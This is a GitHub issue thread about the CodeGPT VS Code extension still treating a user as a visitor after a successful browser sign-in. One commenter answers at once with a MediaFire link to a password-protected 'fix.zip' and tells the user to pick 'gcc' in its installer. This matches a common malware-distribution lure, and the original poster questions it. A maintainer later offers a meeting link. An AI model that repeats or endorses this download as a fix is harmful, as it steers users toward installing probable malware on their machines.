### ISSUE TITLE
Connection to VS code seems ineffective after success message

### ISSUE THREAD

**Issue by Sacropyne** [JudiniLabs/code-gpt-docs#361]
Hi, 

Through the VS code extension, clicking on the User icon allows to make this windows appear :

<img width="203" alt="1" src="https://github.com/user-attachments/assets/8e158ecb-8f40-48c4-9c4d-575ed8c74a85">

When I click on "sign in", I am redirected to my web browser where I can sign in, and when I do a window opens and asks me if I want to link the account with the VS code app, which I agree to, then a success message appears on top of the web page inviting me to go back on the VS code app, where sadly nothing has happened, I am still a visitor with the -1 out of -1 daily interaction with the same invitation to create an account and to sign in. Did I miss a step or is there something wrong ? 

Thanks !

VS code version : 1.92.2
Extension version : 3.5.25

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Sacropyne** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Could you detail the problem and the solution ? This almost instantaneous answer with a link to an installer does not look reassuring. Does this mean it has already been identified/analyzed ? Do you have a link towards previous discussions ?

**Comment by PilarHidalgo** [comment]
Hi, could you please set a meeting with us to help you here: https://calendly.com/pilar-hidalgo
